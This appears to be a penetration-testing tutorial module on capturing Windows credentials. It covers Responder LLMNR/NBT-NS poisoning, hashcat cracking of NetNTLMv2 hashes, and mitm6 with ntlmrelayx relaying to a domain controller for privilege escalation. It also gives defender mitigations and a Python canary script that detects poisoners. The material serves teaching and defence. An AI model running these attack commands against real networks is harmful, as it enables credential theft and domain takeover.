Last updated: April 29, 2026
Most internal pentests start with passive listening. Responder + MITM6 capture authentication attempts and convert them to crackable hashes.
Responder — LLMNR/NBT-NS poisoning
When Windows can't resolve a name via DNS, it falls back to LLMNR/NBT-NS broadcasts. Responder answers them, claiming to be the requested host. The victim then authenticates to Responder, and its NetNTLMv2 challenge/response (the "hash") is captured.
sudo responder -I eth0 -wF
# Wait. Captured hashes are written to Responder's logs/ directory.
# Crack the NetNTLMv2 hashes (hashcat mode 5600) with a wordlist and a rule:
hashcat -m 5600 hashes.txt rockyou.txt -r OneRule.rule
MITM6 — IPv6 SLAAC poisoning
Most networks are dual-stack but only manage IPv4. MITM6 advertises itself as the IPv6 router via Router Advertisements; clients prefer IPv6, so their traffic flows through MITM6.
Combined with ntlmrelayx: capture authentications and relay to LDAP / SMB / HTTP for privilege escalation.
mitm6 -i eth0 -d corp.local
# In another terminal:
ntlmrelayx.py -6 -wh wpad-fake -t ldaps://dc.corp.local --escalate-user lowpriv
Defender
- Disable LLMNR + NBT-NS via GPO
- Configure DHCPv6 properly or disable IPv6 if not needed
- Enable SMB signing and make it mandatory (required, not merely supported)
- Network segmentation; limit broadcast domain
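Added example, not part of this module: a canary LLMNR query a defender can run from a host on the segment to detect an active poisoner. The queried name is random and does not exist, so no honest host should answer it; anything that does (Responder answers every LLMNR query it sees) is reported by source IP. Assumptions: Python 3 standard library only, IPv4 multicast reachable on the local segment; the function names are mine.

```python
import os
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR IPv4 multicast group (RFC 4795)
LLMNR_PORT = 5355

def build_llmnr_query(name: str, txid: int) -> bytes:
    """Build an LLMNR A-record query; the wire format is the DNS one."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # QDCOUNT=1
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)       # QTYPE=A, QCLASS=IN

def is_poisoned_reply(reply: bytes, txid: int) -> bool:
    """A reply to our txid with QR set and ANCOUNT > 0 is a spoof: the canary
    name does not exist, so no honest host should ever answer for it."""
    if len(reply) < 12:
        return False
    rid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", reply[:12])
    return rid == txid and bool(flags & 0x8000) and an > 0

def probe(bind_ip: str = "0.0.0.0", timeout: float = 2.0):
    """Send one canary query and return (canary_name, [IPs that answered])."""
    name = "canary-" + os.urandom(4).hex()          # constructed, never a real host
    txid = random.randrange(0, 0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)  # stay on-link
    sock.bind((bind_ip, 0))
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:                                 # collect until the timeout fires
            data, (src, _port) = sock.recvfrom(4096)
            if is_poisoned_reply(data, txid):
                hits.append(src)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return name, hits

if __name__ == "__main__":
    canary, poisoners = probe()
    for ip in poisoners:
        print(f"ALERT: {ip} answered LLMNR for non-existent host {canary}")
    if not poisoners:
        print("no LLMNR responder seen on this segment")
```

Run it periodically from a few hosts per VLAN; a hit is a high-confidence signal because legitimate LLMNR responders only answer for their own name. It does not cover NBT-NS or IPv6 (MITM6) poisoning, which need their own canaries.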